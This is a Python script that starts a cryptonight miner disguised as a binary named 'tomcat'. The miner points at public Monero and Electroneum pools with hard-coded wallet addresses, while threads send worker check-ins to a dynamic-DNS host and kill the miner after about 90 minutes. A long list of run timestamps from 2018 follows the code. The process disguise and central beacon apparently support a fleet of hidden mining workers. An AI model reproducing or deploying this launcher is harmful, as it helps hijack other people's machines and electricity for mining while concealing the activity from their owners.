import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:31:03.672330
#2018-02-17 16:17:01.422588
#2018-02-17 18:04:02.233288
#2018-02-17 19:52:04.341378
#2018-02-17 21:41:07.459540
#2018-02-17 23:25:05.319488
#2018-02-18 01:14:01.647897
#2018-02-18 03:03:01.492600
#2018-02-18 04:51:08.028053
#2018-02-18 06:42:06.548033
#2018-02-18 08:31:07.082452
#2018-02-18 10:19:07.101870
#2018-02-18 12:05:02.115643
#2018-02-18 13:50:06.235116
#2018-02-18 15:40:08.115010
#2018-02-18 17:29:05.756833
#2018-02-18 19:17:03.479253
#2018-02-18 21:03:05.258352
#2018-02-18 22:49:03.914799
#2018-02-19 00:38:04.670686
#2018-02-19 02:25:07.843075
#2018-02-19 04:12:05.220643
#2018-02-19 05:56:03.910046
#2018-02-19 07:45:07.953110
#2018-02-19 09:34:04.932226
#2018-02-19 11:24:07.850695
#2018-02-19 13:11:04.755419
#2018-02-19 14:59:01.835592
#2018-02-19 16:48:01.732567
#2018-02-19 18:34:10.067330
#2018-02-19 20:20:09.478796
#2018-02-19 22:09:08.006301
#2018-02-19 23:56:06.022615
#2018-02-20 01:43:01.662960
#2018-02-20 03:32:04.150538
#2018-02-20 05:19:07.621488
#2018-02-20 07:05:01.507805
#2018-02-20 08:50:10.193223
#2018-02-20 10:34:01.991207
#2018-02-20 12:19:08.456489
#2018-02-20 14:06:08.975236
#2018-02-20 15:49:04.747239
#2018-02-20 17:36:06.011130
#2018-02-20 19:24:01.526809
#2018-02-20 21:13:04.204175
#2018-02-20 22:59:05.994413
#2018-02-21 00:42:01.231835
#2018-02-21 02:28:04.672612
#2018-02-21 04:14:01.513591
#2018-02-21 06:01:05.337628
#2018-02-21 07:48:06.812528
#2018-02-21 09:28:03.742006
#2018-02-21 11:17:05.713889
#2018-02-21 13:04:01.468537
#2018-02-21 14:52:01.599757
#2018-02-21 16:39:04.523492
#2018-02-21 18:29:10.365779
#2018-02-21 20:14:06.153154
#2018-02-21 22:02:04.778316
#2018-02-21 23:48:03.618833
#2018-02-22 01:39:06.668444
#2018-02-22 03:27:04.480183
#2018-02-22 05:14:05.388290
#2018-02-22 06:57:05.617279
#2018-02-22 08:45:01.754457
#2018-02-22 10:32:08.722961
#2018-02-22 12:19:10.473010
#2018-02-22 14:03:01.850439
#2018-02-22 15:50:07.965859
#2018-02-22 17:37:10.406915
#2018-02-22 19:25:06.623708
#2018-02-22 21:18:06.970203
#2018-02-22 23:03:06.743610
#2018-02-23 00:49:05.699296
#2018-02-23 02:36:06.773954
#2018-02-23 04:26:04.893181
#2018-02-23 06:11:01.883150
#2018-02-23 07:56:05.740123
#2018-02-23 10:11:08.787575
#2018-02-23 12:05:07.634888
#2018-02-23 13:52:07.908862
#2018-02-23 15:43:09.440677
#2018-02-23 17:29:05.841664
#2018-02-23 19:18:05.404929
#2018-02-23 21:01:03.858353
#2018-02-23 22:47:07.033926
#2018-02-24 00:34:07.416180
#2018-02-24 02:25:03.829418
#2018-02-24 04:14:05.824283
#2018-02-24 06:02:08.386172
#2018-02-24 07:49:06.282649
#2018-02-24 09:34:07.182729
#2018-02-24 11:29:02.143885
#2018-02-24 13:18:07.740982
#2018-02-24 15:09:04.188413
#2018-02-24 16:58:01.512360
#2018-02-24 18:46:06.052051
#2018-02-24 20:38:06.473382
#2018-02-24 22:45:05.682649
#2018-02-25 02:06:06.281213
#2018-02-25 05:57:01.466643
#2018-02-25 11:39:01.840281